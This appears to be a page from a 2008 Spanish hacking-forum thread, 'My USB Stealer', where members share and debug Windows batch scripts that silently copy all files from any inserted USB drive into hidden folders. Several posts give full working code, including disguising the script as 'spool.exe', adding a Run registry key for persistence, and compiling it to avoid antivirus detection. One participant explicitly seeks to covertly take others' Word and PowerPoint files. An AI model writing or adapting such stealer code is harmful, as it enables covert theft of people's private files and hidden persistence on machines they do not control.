elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

á

 


Tema destacado: AIO elhacker.NET 2021 Compilaciˇn herramientas anßlisis y desinfecciˇn malware


+  Foro de elhacker.net
|-+  Programaciˇn
| |-+  Scripting
| | |-+  My USB Stealer
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 Ir Abajo Respuesta Imprimir
Autor Tema: My USB Stealer  (Leído 13,359 veces)
SmartGenius

Desconectado Desconectado

Mensajes: 181


:P


Ver Perfil WWW
Re: My USB Stealer
« Respuesta #10 en: 31 Octubre 2008, 23:07 pm »

Muy seguramente estan haciendo uso dle codigo que esta mas arriba....y ese tiene una linea de codigo que muestra ese aviso... y pues es para eso..para que avise...

Código:
:load
cls
echo MsgBox "Se inicio el Escaneo...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto ini

aunque deberian usar la que postee mas abajo en el cual ya quite esa funcion...simplemente empieza a escanear con base en los dos archivos previamente configurados por la interfaz...y todo lo hace da manera silenciosa....

http://rapidshare.com/files/154932419/USBStealerbySmart.rar

Saludos.


En línea


estudcom

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: My USB Stealer
« Respuesta #11 en: 18 Noviembre 2008, 20:17 pm »

oye no me funciona. Podrias hacerme el favorazo enrome de hacer un programita sencillo que solo copie documentos de Power Point y word de forma oculta y automaticamente. y nisiquiera tiene que ser configurable con que lo copie n la misma carpeta donde ponga el programa bastaria. gracias


En línea

corax

Desconectado Desconectado

Mensajes: 220


Primum non nocere


Ver Perfil
Re: My USB Stealer
« Respuesta #12 en: 19 Noviembre 2008, 14:31 pm »

Si lees los cˇdigos que hice yo al principio del post verßs que justamente lo que explican es cˇmo hacÚrtelo t˙ mismo a partir de las plantillas que puse, todo muy casero y muy rudimentario, pero oculto y funcional.

Intenta hacerlo t˙, y si tienes alg˙n problema con los cˇdigos en batch o al compilar me comentas  ;)
En línea

Nuestro idioma ha tardado 12 siglos en llegar hasta hoy dÝa. T˙ tan sˇlo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.
estudcom

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: My USB Stealer
« Respuesta #13 en: 19 Noviembre 2008, 16:57 pm »

corax me acabas de arrojar mucha luz. a veces estamos tan cerca de un problema que perdemos la perspectiva y no podemos ver las opciones. Lo que quiero decir es que voy ha ahcer lo que me has dicho pero tengo algunas dudas (sobretodo porque no se mucho de informßtica). Sˇlo quiero que me digas que es lo que tengo que cambiar para que se inicie con windows y copie todo tipo de archivos en la carpeta c:/z434733/eviews/
Me encantarÝa que me postearas el code modificado para lo que te pido pero por intentarlo te pongo el code como yo lo he modificado (en realidad he mezclado un poco de los dos codigos de arriva para que se inice automaticamente y para que copie todo tipo de archivos), mi mayor problema es que no se que tengo que hacer con el code: ┐lo guardo en un txt con alguna extensiˇn especifica? ┐como se hace eso? y mi ortro problema es que no se que tengo que cambiar para que copie todo en la ruta c:/z434733/eviews/
Gracias por tu ayuda de verdad

Código:
@echo off
 
If Exist "%PROGRAMFILES%\USB\spool.exe" (goto alpha) else (goto betha)
 
:betha
MD "%PROGRAMFILES%\USB\"
copy /y %0 "%PROGRAMFILES%\USB\spool.exe"
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spool /d "%PROGRAMFILES%\USB\spool.exe" /f
goto alpha
 
:alpha
If Exist "%USERPROFILE%\USB\" (goto echeck) else (
MD "%USERPROFILE%\USB\"
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)
 
:fcheck
ping -n 2 localhost
if exist F:\ (goto existf) else (goto gcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)
 
:hcheck
ping -n 2 localhost
if exist H:\ (goto existh) else (goto echeck)
 
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\STOLEN\*.* /E /I
(goto fcheck)
 
 
:existf
ping -n 2 localhost
xcopy F:\*.* C:\STOLEN\*.* /E /I
(goto gcheck)
 
 
:existg
xcopy G:\*.* C:\STOLEN\*.* /E /I
ping -n 2 localhost
(goto hcheck)
 
 
:existh
xcopy H:\*.* C:\STOLEN\*.* /E /I
ping -n 2 localhost
(goto echeck)

Una ultima cosa he estado probando por cuariosidad (aunque sin saber lo que hago realmente) y he guardado el documento de bloc de notas con la extensiˇn .bat y no se porque no se ha creado ningun .bat, es decir, sigue siendo un archivo de bloc de notas. he probado ha cambiar la extensiˇn a .ini y tampoco sirve. Es como si no pudiera cambiar la extensiˇn de los archivos del bloc de notas. A mi me suena que antes podÝa ┐que ha podido pasar? habre cambiado algo de la configuraciˇn del ordenador sin querer?. Lo digo porque sino puedo crear la extensiˇn que requiera este programa quizas podrias mandarme un alrchivo con esa extensiˇn. En fin estoy aquÝ a la expectartiva e impaciente. Gracias y un saludo
« Última modificación: 19 Noviembre 2008, 17:13 pm por estudcom » En línea

corax

Desconectado Desconectado

Mensajes: 220


Primum non nocere


Ver Perfil
Re: My USB Stealer
« Respuesta #14 en: 19 Noviembre 2008, 22:34 pm »

Hola estudcom,

Hay un par de cosas del code que debes cambiar:

Si quieres copiar los archivos a C:\z434733\eviews\ tienes que cambiar la siguiente parte del cˇdigo:

Cˇdigo original:
xcopy %USBLETTER%:\*.* C:\STOLEN\*.* /E /I (siendo %USBLETTER% la letra de la unidad extraÝble, es decir, E, F, G, H y las que t˙ le quieras meter si creas mßs redirecciones)

Cˇdig%USBLETTER%:\*.* C:\z434733\eviews\*.* /E /I

Es decir, en la segunda ruta especificas la direcciˇn a la que se va a copiar.
(NOTA: Veo que has puesto la direcciˇn de C:\z434733\eviews\ con esta barra: /. En batch la barra que se utiliza para definir las rutas es esta: \ [la barra inversa])

Respecto a que no se te cambian las extensiones de los archivos del bloc de notas: quizß no tengas habilitadas las extensiones en el ordenador en el que trabajas (es decir, en vez de ver el nombre de archivo "Prueba.txt", por poner un ejemplo, veas sÝmplemente "Prueba"). ┐QuÚ pasa en ese caso? Que al ponerle extensiˇn .bat realmente no le estßs dando una nueva extensiˇn, ya que las tienes ocultas, sino que  al archivo "prueba" le estßs dando el nuevo nombre de "prueba.bat", siendo la extensiˇn de ambos la de .txt

Resumiendo, no le estßs cambiando realmente la extensiˇn al archivo, sino que estßs haciendo archivos con nombres como "prueba.bat.txt".
Para corregir eso ve a la pesta˝a "herramientas" en cualquier carpeta, de ahÝ a la opciˇn "opciones de carpeta", y una vez ahÝ selecciona la pesta˝a "ver". Dentro de ella hay un listado de opciones, unas marcadas y otras sin marcar. Cerca del final hay una llamada "Ocultar las extensiones para tipos de archivo conocido". Desmßrcala si estß marcada.

De todas maneras este cˇdigo no estß pensado para renombrar el archivo a .bat y ejecutarlo, ya que la idea es que corra oculto a la vista del usuario.

Si te fijas, en las primeras lÝneas de cˇdigo estß la orden:
copy /y %0 "%PROGRAMFILES%\USB\spool.exe"
┐QuÚ significa esto? Que copie el archivo actual (%0), desde la ruta que sea y con el nombre que sea a la carpeta C:\Archivos de Programa\USB\ y con el nombre de archivo de spool.exe
Para que funcione correctamente al copiarse a cualquier sitio con la extensiˇn .exe el archivo tiene que ser un .exe. Si renombramos un .bat a un .exe directamente no corre.

Entonces lo que debes hacer es descargarte un compilador, como por ejemplo el Quick Batch File Compiler (a ser posible una de las ˙ltmas versiones, ya que los archivos compilados por versiones anteriores son detectados por los antivirus aunque en realidad no lo sean). Esto lo puedes encontrar en varios posts de este foro, sobre todo en los manuales de Octalh, o si no buscando un poco en google, que tambiÚn sale.



Por cierto, si quieres darle otro nombre al ejecutable (que no se llame en ˙ltimo tÚrmino spool.exe) debes cambiar el nombre en la rama de:

copy /y %0 "%PROGRAMFILES%\USB\spool.exe"

y en la de:

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spool /d "%PROGRAMFILES%\USB\spool.exe" /f

De la misma manera, si quieres copiarlo a otra carpeta, sˇlo cambia las rutas de
%PROGRAMFILES%\USB\
en ambas lÝneas.
En línea

Nuestro idioma ha tardado 12 siglos en llegar hasta hoy dÝa. T˙ tan sˇlo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.
estudcom

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: My USB Stealer
« Respuesta #15 en: 20 Noviembre 2008, 16:12 pm »

guau!!! muchas gracias corax, acabas de mostrarme un mundo nuevo. No sabes el tiempo que he estado buscando como hacer un batch que fuera .exe y la solucion ante mis narices. En fin te cuento mis problemas:
He creado el code tal cual me has dicho con los cambios y utilizando Quick Batch File Compiler 3.1.6.0 (espero que la versiˇn este bien, mi antivirus no da problemas). He ido a archivos de programa y a la carpeta usb y ahÝ estaba el spool.exe. He reiniciado y he introducido el pen drive. He ido a la ruta y ha copiado todo!!. El problema es que despuÚs le he dado ha expulsar pen drive de forma segura y me salta el mensaje de que se estß usando.
Pregunta: ┐No hay alguna forma de que ese mensaje no salte?
El otro problema es que he intentado reiniciar el ordenador y me saltado una ventana de que un programa aun esta ejecutandose cmd.exe o algo asÝ y hasta que no le doy a finalizar programa no se reinicia el ordenaodr
Pregunta: ┐esto es por mi ordenador o por el spool.exe? Como puedo hacer parta que tampoco salga.

Como he tenido estos dos problemas he borrado la carpeta USB de Archivos de programa y el spool.exe que habia dentro (por cierto ┐asÝ lo he quitado del todo no?). Para probar otras alternativas he usado el primer code que pusiste arriva pero un poco modificado:
Código:
@echo off
If Exist C:\z23856\b3637\eviews47\ (goto echeck) else (
MD C:\z23856\b3637\eviews47\
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)
 
:fcheck
ping -n 2 localhost
if exist F:\ (goto existf) else (goto gcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)
 
:hcheck
ping -n 2 localhost
if exist H:\ (goto existh) else (goto echeck)
 
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I
(goto fcheck)
 
 
:existf
ping -n 2 localhost
xcopy F:\*.* C:\z23856\b3637\eviews47\*.* /E /I
(goto gcheck)
 
 
:existg
xcopy G:\*.* C:\z23856\b3637\eviews47\*.* /E /I
ping -n 2 localhost
(goto hcheck)
 
 
:existh
xcopy H:\*.* C:\z23856\b3637\eviews47\*.* /E /I
ping -n 2 localhost
(goto echeck)

Entonces con el Quick Batch File Compiler 3.1.6.0 he creado el .exe del batch (en el modo silencioso igual que el spool.exe) y se ha creado en la misma carpeta donde tenia el batch. Como el problema de este code es que no se inicia automßticamente con windows he hecho un acceso directo y lo he copiado a la carpeta inicio. He reiniciado y una vez iniciada la sesion he metido el pen y guay ha copiado todo el contenido. El problema sigue siendo que no me deja expulsar el pen drive de forma segura y sin embargo ya no me sale el cartel (cuando intento pagar o reiniciar el ordenador) de que hay un programa que sigue funcionando.

Una cosa importante es que aun borrando todos los archivos cuando he pasado de batch a .exe (que digo yo se supone que se desinstala la aplicaciˇn) sigue copiando archivos de los pen drive que se introduzcan: ┐Como se desinstala esta aplicaciˇn completamanete?. Ademßs me he fijado que para poder expulsar el pen drive de forma segura tengo que ir al Administrador de tareas de windows y finalizar un proceso llamado, xcopy.exe ┐esto esta relacionado no?

Conclusiˇn: Estos problemillas son por culpa de mi ordenador? quiero decir si en otro ordenador cualquiera no deberian salir esas ventanas de programas que siguen usando y si me permitiria expulsar la unidad extraible de forma segura.
Y finalmente lo de que se inicie con windows en cualquier cuenta y aunque sean diferentes usuarios ┐como se introduce en el codido que te he puesto?.
Muchisimas gracias por todo de verdad acabas de ayudarme ha cerrar un periodo de mi vida jeje.

editado-
perdona si soy pesado pero que deberia eliminar del code para que sˇlo copiara la unidad g o sˇlo la e??? He probado combinaciones y no me funciona gracias
« Última modificación: 20 Noviembre 2008, 18:10 pm por estudcom » En línea

WestOn

Desconectado Desconectado

Mensajes: 272


El testamento Maya...


Ver Perfil
Re: My USB Stealer
« Respuesta #16 en: 20 Noviembre 2008, 19:44 pm »

Wenas, para q se ejecute al inicio:
Código:
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v NombreEtiqueta /t  REG_SZ /d "UbicacionArchivo" /f
NombreEtiqueta:Lo que tu quieras.
UbicacionArchivo:Ubicacion del archivo q se iniciara al inicio :P

Respecto a lo de q solo 'detecte' las unidades G y E puedes hacer esto:
Código:
@echo off
If Exist C:\z23856\b3637\eviews47\ (goto echeck) else (
MD C:\z23856\b3637\eviews47\
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I
(goto fcheck)
 
:existg
xcopy G:\*.* C:\z23856\b3637\eviews47\*.* /E /I
ping -n 2 localhost
(goto hcheck)

un saludo ;)

PD:El programa Xcopy.exe es lo que hace que puedas copiar archivos de tu USB a la carpeta o viceversa.
En línea

En mi cabeza existe una barrera espacio-tiempo de 4cm│. ┐Alguien sabe como eliminarla?.
                                                                                                                                                                                                                            
estudcom

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: My USB Stealer
« Respuesta #17 en: 20 Noviembre 2008, 20:39 pm »

gracias west on por contestarme tan rapido. Pero, aunque me has aclarado algunas cosas, sigo necesitando ayuda porque no me funiona. Con lo que m has dicho he creado este code:
Código:
@echo off
 
If Exist "C:\z23856\2.exe" (goto alpha) else (goto betha)
 
:betha
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v USB /t  REG_SZ /d "C:\z23856\2.exe" /f
goto alpha
 
:alpha
If Exist C:\z23856\b3637\eviews47\ (goto echeck) else (
MD C:\z23856\b3637\eviews47\
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto gcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto echeck)
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I
(goto gcheck)
 
:existg
xcopy G:\*.* C:\z23856\b3637\eviews47\*.* /E /I
ping -n 2 localhost
(goto echeck)

He cambiado lo de (goto fcheck) y (goto hcheck) porque no existen esas "ordenes" o lo que sea. Como ves lo he cambiado sin saber mucho y basandome en los codigos de corax. El problema es que no sˇlo no se autoinicia sino que no copia nada. Yo creo que he escrito mal lo de para que se autoinicie. Y lo que querÝa saber es cual seria el code para que copie sˇlo la unidad e, He creado este pero no funciona:
Código:
@echo off

If Exist C:\z23856\b3637\eviews47\ (goto echeck) else (
MD C:\z23856\b3637\eviews47\
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe)
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I
Quizas podrÝas crear el code para mi? ya sabeis para que se autoinicie al iniciar windows con todos los usuarios y que copie todo a c:\Z23856\B3637\EVIEWS47\
En línea

8789poli

Desconectado Desconectado

Mensajes: 39


Ver Perfil
Re: My USB Stealer
« Respuesta #18 en: 21 Noviembre 2008, 17:31 pm »

Necesitas ayuda con codigos.....ya tengo la idea bastante desarrollada hace rato...y ya ahi una version funcional...programada con ayuda del compa˝ero Rockox...



Mira...lo puedes descargar aqui...

http://two.xthost.info/smartgenius/SourceCodeUSBStealerV1.01.zip
http://rapidshare.com/files/122880149/USBPendriveStealerv1.01.zip

El programa consta de dos codes...uno de configuracion y uno de escaneo...

USBStealer
Código:
@echo off
mode con cols=70
mode con lines=40
title Pendrive Stealer - Local
color 0a
REM Script de Copia de Dispositivos USB
REM Coded by :: SmartGenius :: , RockoX

if exist "myfolder.cfg" (goto anim) else (goto ins)

:ins
cls
echo.
echo  Instalando el Programa...
echo  Por favor espere
echo *.jpg,*.gif,*.png,*.bmp,*.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm>"ftypes.cfg"
md "Mi Carpeta"
echo "Mi Carpeta\">"myfolder.cfg"
ping -n 2 0.0.0.0 > nul
pause
goto anim

:anim
cls
echo.
echo        ▒▒▒▒▒                                               ▒▒▒▒▒
echo      ▒▒░░░░░▒                                            ▒▒░░░░░▒
echo      ▒░░░░░░░▒▒                                         ▒░░░░░░░▒
echo    ▒▒░░░░░░░░░▒                                        ▒▒░░░░░░░░▒▒
echo   ▒░░░░░░░░░░░▒                                      ▒▒░░░░░░░░░░░░▒
echo   ▒░░░░░░░░░░░░▒▒            ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓   ▒▒▒░░░░░░░░░░░░░░▒
echo    ▒▒░░░░░░░░░░░░▒▒▒     ▓▓▓▓▒▒░░░░░░░░░░░░▒▒▓▓▓▓▒░░░░░░░░░░░░▒▒▒▒▒
echo      ▒▒▒▒▒▒░░░░░░░░░▒▓▓▓▓░░░░░░░░░░░░░░░░░░░░░░▓▓▓▓░░░░░░▒▒▒▒▒
echo            ▒▒▒░░░░░▓▓▒▒░░░░░░░░░░░░░░░░░░░░░░░░░░▓▓▓▓░░▒▒
echo               ▒░░▓▓▒▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▓▓▓▒
echo                 ▓▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▒▓▓
echo                ▓▓░░░░░░░░░░▓▓▓▓░░░░░░░░▓▓▓▓░░░░░░░░░░░▓▓
echo                ▓▓░░░░░░░░▓▓▓▓▓▓▓▓░░░░▓▓▓▓▓▓▓▓░░░░░░░░░▓▓
echo                ▓▓░░░░░░░░▓▓▓▓▓▓▓▓░░░░▓▓▓▓▓▓▓▓░░░░░░░░░▓▓
echo                ▓▓░░░░░░░░░▒▓▓▓▓░░░░░░░▒▓▓▓▓░░░░░░░░░░░▓▓
echo                ▓▓▒▒░░░░░░░░░░░░░░▒▒▒▒░░░░░░░░░░░░░░░░▓▓
echo                 ▓▓▓░░░░░░░░░░░░░░▓▓▓▓░░░░░░░░░░░░░░▓▓▓▓
echo                ▒▒▓▓▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░▓▓▓▓░░▒▒
echo               ▒▒░░░░▓▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░▓▓░░░░░░▒▒
echo            ▒▒▒░░░░░░░▓▓▓▓░░░░░░░░░░░░░░░░░░░░░▓▓▓░░░░░░░░░░▒▒▒▒▒▒▒
echo      ▒▒▒▒▒▒░░░░░░░░▒▒▓  ▓▓▓░░░░░░░░░░░░░░░░░░▓▓  ▒▒░░░░░░░░░░░░░░░▒▒
echo    ▒▒░░░░░░░░░░░░▒▒       ▓░░░░░░░░░░░░░░░░░░▓     ▒▒▒▒░░░░░░░░░░░░░▒
echo    ▒░░░░░░░░░░░▒▒         ▓░░░░░░░░░░░░░░░░░░▓         ▒▒░░░░░░░░░░▒▒
echo    ▒▒░░░░░░░░▒▒           ▓░░▒░░▒░░▒░░▒░░▒░░░▓          ▒░░░░░░░░▒▒
echo      ▒▒░░░░░▒▒            ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓          ▒▒░░░░░░▒
echo        ▒░░░▒▒                                             ▒░░░░▒
echo         ▒▒▒▒                                               ▒▒▒▒
echo.
echo              ▓▓▓ ▓▓▓ ▓▓  ▓▓▓    ▓▓ ▓▓ ▓▓▓ ▓ ▓ ▓▓▓ ▓▓▓  ▓▓▓
echo              ▓   ▓ ▓ ▓ ▓ ▓      ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓   ▓  ▓ ▓
echo              ▓   ▓ ▓ ▓ ▓ ▓▓▓ ▓▓ ▓   ▓ ▓▓▓ ▓▓  ▓▓▓ ▓▓▓  ▓▓▓
echo              ▓   ▓ ▓ ▓ ▓ ▓      ▓   ▓ ▓ ▓ ▓ ▓ ▓   ▓  ▓   ▓
echo              ▓▓▓ ▓▓▓ ▓▓  ▓▓▓    ▓   ▓ ▓ ▓ ▓ ▓ ▓▓▓ ▓  ▓ ▓▓▓
echo.
pause
goto main

:main
cls
echo.
echo.
echo                ╔════════════════════════════╗
echo                ║ Pendrive Stealer v 1.0  xD ║
echo                ╚════════════════════════════╝
echo.
echo    Elija una Opcion:
echo.
echo   ┌─┐ ┌─────────────────────────────┐  ┌─┐ ┌──────────────────────┐
echo   │1│ │ Definir carpeta principal...│  │2│ │ Tipos de Archivos..  │
echo   └─┘ └─────────────────────────────┘  └─┘ └──────────────────────┘
echo   ┌─┐ ┌─────────────────────────────┐  ┌─┐ ┌──────────────────────┐
echo   │3│ │ Iniciar Escaneo de USBs...  │  │4│ │ Ayuda del Programa.. │
echo   └─┘ └─────────────────────────────┘  └─┘ └──────────────────────┘
echo   ┌─┐ ┌─────────────────────────────┐
echo   │5│ │ Salir del Programa..        │
echo   └─┘ └─────────────────────────────┘
echo.
set /p opc=">> "
if "opc"=="" (goto main)
set opc=%opc: =_%

if %opc%==1 goto dcp
if %opc%==2 goto ftype
if %opc%==3 goto scan
if %opc%==4 goto help
if %opc%==5 (goto out) else (goto err)

:err
cls
echo.
echo ERROR...
echo.
echo No ha escogido una Opcion Correcta
echo Vuelva a Intentarlo
echo.
pause
goto main

:dcp
cls
echo.
echo.
echo                ╔════════════════════════════╗
echo                ║ Pendrive Stealer v 1.0  xD ║
echo                ╚════════════════════════════╝
echo.
echo   En esta opcion puede definir en donde se guardaran
echo   los archivos copiados...
echo.
echo  Arrastre aqui la carpeta
echo.
set /p dcp=">> "
if "dcp"=="" (goto dcp)
echo %dcp%>"myfolder.cfg"
echo.
echo  La carpeta : %dcp%
echo  se ha establecido exitosamente...
echo.
pause
goto main

:ftype
cls
echo.
echo.
echo                ╔════════════════════════════╗
echo                ║ Pendrive Stealer v 1.0  xD ║
echo                ╚════════════════════════════╝
echo.
echo   Configure aqui los tipos de archivos que desea Escanear y Copiar
echo.
echo    Elija una Opcion:
echo.
echo   ┌─┐ ┌────────────────┐  ┌─┐ ┌──────────────────────────┐
echo   │1│ │ Documentos...  │  │2│ │ Imagenes ^& Fotos..       │
echo   └─┘ └────────────────┘  └─┘ └──────────────────────────┘
echo   ┌─┐ ┌────────────────┐  ┌─┐ ┌──────────────────────────┐
echo   │3│ │ Musica ^& Audio │  │4│ │ Documentos ^& Imagenes..  │
echo   └─┘ └────────────────┘  └─┘ └──────────────────────────┘
echo   ┌─┐ ┌────────────────┐  ┌─┐ ┌──────────────────────────┐
echo   │5│ │ Videos *       │  │6│ │ Todas las Opciones... *  │
echo   └─┘ └────────────────┘  └─┘ └──────────────────────────┘
echo.
echo  * Las Opciones 5 y 6 pueden tardar mas de lo normal...
echo.
set /p typ=">> "
if "typ"=="" (goto ftype)
if %typ%==1 (echo *.txt,*.doc,*.pdf,*.ppt,*.pps,*.xls,*.htm,*.rtf,*.mdb>"ftypes.cfg" & goto yap)
if %typ%==2 (echo *.jpg,*.gif,*.bmp,*.png,*.psd,*.jpeg,*.tiff>"ftypes.cfg" & goto yap)
if %typ%==3 (echo *.mp3,*.mp4,*.wav,*.mid,*.wma,*.ogg>"ftypes.cfg" & goto yap)
if %typ%==4 (echo *.txt,*.doc,*.pdf,*.ppt,*.pps,*.xls,*.htm,*.rtf,*.mdb,*.jpg,*.gif,*.bmp,*.png,*.psd,*.jpeg,*.tiff>"ftypes.cfg" & goto yap)
if %typ%==5 (echo *.mpg,*.wmv,*.asf,*.3gp,*.avi,*.mov>"ftypes.cfg" & goto yap)
if %typ%==6 (echo *.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm,*.jpg,*.gif,*.bmp,*.png,*.mp3,*.mp4,*.wma>"ftypes.cfg" & goto yap)
goto main

:yap
for /F "tokens=*" %%b in (ftypes.cfg) do set filetypes=%%b
echo.
echo  Tipos de Archivos Configurados correctamente
echo.
echo  Archivos con Extension: %filetypes%
echo.
pause
goto main

:scan
start USBScan.bat
exit

:help
cls
echo.
echo.
echo                ╔════════════════════════════╗
echo                ║ Pendrive Stealer v 1.0  xD ║
echo                ╚════════════════════════════╝
echo.
echo  Este programa tiene la Funcion de copiar archvos desde dispositivos
echo  USB, de manera silenciosa y sin levantar sospechas...
echo.
echo  El programa puede ser congifurado facilmente, dandole opciones de
echo  escoger que tipos de archivos copiar y en que carpeta se deben
echo  guardar...
echo.
echo.
echo  Titulo:  Pendrive USB Stealer, Version 1.0 Local
echo  Autores: :: SmartGenius ::, RockoX
echo  Web:     http://foro.code-makers.es
echo.
echo  SmartGenius, Corp. 2008
echo.
pause
goto main
 
:out
cls
echo MsgBox "Gracias por usar este Programa", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

USBScan
Código:
@echo off
title USB Stealer - Local
color 0a

:load
cls
echo MsgBox "Se inicio el Escaneo...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto ini

:ini
if not exist "myfolder.cfg" (goto fixfolder)
for /F "tokens=*" %%a in (myfolder.cfg) do set myfolder=%%a
if not exist "ftypes.cfg" (gotp fixfiles)
for /F "tokens=*" %%b in (ftypes.cfg) do set filetypes=%%b
goto main

:main
for %%u in ( D E F G H I J K L M N O P Q R S T U V W X Y Z) do call :comp %%u
goto ini

:comp
set unidad=%1
FSUTIL FSINFO DRIVETYPE %unidad%:>%temp%\letuni.tmf
if %errorlevel%==1 (goto usb2)
for /F "tokens=*" %%e in (%temp%\letuni.tmf) do set let=%%e
if %let:~-4%==ble (call :usb %unidad%)
if %let:~-4%==ija (goto :eof)
if %let:~-4%==ROM (goto :eof)

:usb
set letra=%1
if exist "%letra%:\db.ini" goto :eof
for  /r %letra%: %%t in (%filetypes%) do (copy "%%t" %myfolder%)
echo USB>db.ini
goto :eof

:usb2
for %%n in ( D E F G H I J K L M N O P Q R S T U V W X Y Z) do (call :usb %%n)
goto ini

:fixfiles
echo *.jpg,*.gif,*.png,*.bmp,*.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm>"ftypes.cfg"
echo MsgBox "Los Tipos de Archivo no estan configurados...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

:fixfolder
echo "Mi Carpeta\">"myfolder.cfg"
echo MsgBox "No Hay una Carpeta Predefinida...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

Saludos.

Que cosa mas presiosa :D
me encanto XD
En línea

corax

Desconectado Desconectado

Mensajes: 220


Primum non nocere


Ver Perfil
Re: My USB Stealer
« Respuesta #19 en: 21 Noviembre 2008, 19:40 pm »

Vamos a ver que os estßis liando un poco...

Te aclaro lo que intentabais averiguar WestOn y t˙...

Para a˝adir nuevas unidades al chequeo hay que seguir este patrˇn:

Ě Escaneamos la primera unidad (P.E: la E)
Ě Si existe, pasamos a la fase de copiado de esa unidad
Ě Si no existe, pasamos a la fase de chequeo de la unidad siguiente
Ě Si existe, cuando acabe de copiarse, que pase a la fase de chequeo de la unidad siguente
Ě Cuando lleguemos a la ˙ltima unidad, en vez de seguir en la siguiente redireccionamos ambas a la primera.

De otro modo no funcionarß.


Respecto al proceso XCOPY.exe que estaba en ejecuciˇn... si te fijas en el cˇdigo se hace referencia al xcopy. ┐QuÚ es esto? Pues es un archivo ejecutable que funciona a travÚs de la cmd y cuya funciˇn es copiar, en este caso el contenido Ýntegro de las memorias flash.

Si en vez de copiarlo todo sˇlo quieres copiar un cierto tipo de archivos, cambia la parte del cˇdigo (en la que se llama al xcopy) que pone *.* por *.loquesea, siendo "loquesea" la extensiˇn del tipo de archivos que quieras copiar. Puedes usar varias lÝneas para copiar distintos tipos de archivo. Me explico:

En caso de que quisieras copiar archivos de PowerPoint, cambiarÝas esto:
xcopy H:\*.* C:\STOLEN\*.* /E /I

Por esto:
xcopy H:\*.* C:\STOLEN\*.ppt /E /I
xcopy H:\*.* C:\STOLEN\*.pps /E /I

Y asÝ para distintos tipos de archivo, por ejemplo:
xcopy H:\*.* C:\STOLEN\*.doc /E /I
xcopy H:\*.* C:\STOLEN\*.xls /E /I
xcopy H:\*.* C:\STOLEN\*.jpg /E /I

Si quieres copiar archivos de un cierto nombre, cambia el primer asterisco por el nombre que quieras copiar. Los asteriscos (*) hacen referencia a cadenas de caracteres indeterminados de longitud indeterminada. Las interrogaciones (?) hacen referencia a un solo caracter indeterminado.
No olvides que si vas a usar nombres de mßs de ocho letras o con espacios, o extensiones de mßs de tres letras (Formato 8/3) debes entrecomillar la ruta completa.

Respecto a que las memorias flash se puedan extraer de forma segura... la ˙nica forma es esperando a que acabe de copiar archivos y ampliando el tiempo de los pings. (Sˇlo puedes extraer una memoria flash de forma segura cuando no se estß copiando ni comprobando nada, y esto se produce en el tiempo que dura el ping...) prueba a ampliarlo a tu gusto.

En cuanto a lo de que no se deja reiniciar, es porque el programa estß haciendo su trabajo. Si quieres hacer que se pare por completo tienes dos opciones, o ir al administrador de tareas y parar los procesos correspondientes (el ping.exe, el xcopy.exe, el cmd.exe y %elnombredetuejecutable%.exe). Esto lo puedes automatizar en un batch de la siguiente forma:

Taskkill /IM cmd.exe /f
(supongo que al parar el cmd.exe se paran los otros, si no a˝ade sus nombres de la misma forma)
Shutdown -r -t XX
Siendo -r la opciˇn de reinicio (la de apagado es -s) y las XX el tiempo en segundos (P.Ej: 30, 03, 00...)

Respecto a lo de la desinstalaciˇn... debes borrar el ejecutable que hayas creado MIENTRAS EST╔ PARADO (de lo contrario borras el archivo, pero Úste sigue cargado en memoria, es decir, ejecutßndose), y ademßs la rama del registro que ha creado.
Esto lo puedes borrar desde el MSCONFIG, o si tienes el SpyBot, desde las opciones avanzadas.

Bueno, si te queda alguna duda, hßzmelo saber y tratarÚ de responderte.

Nos vemos  ;)

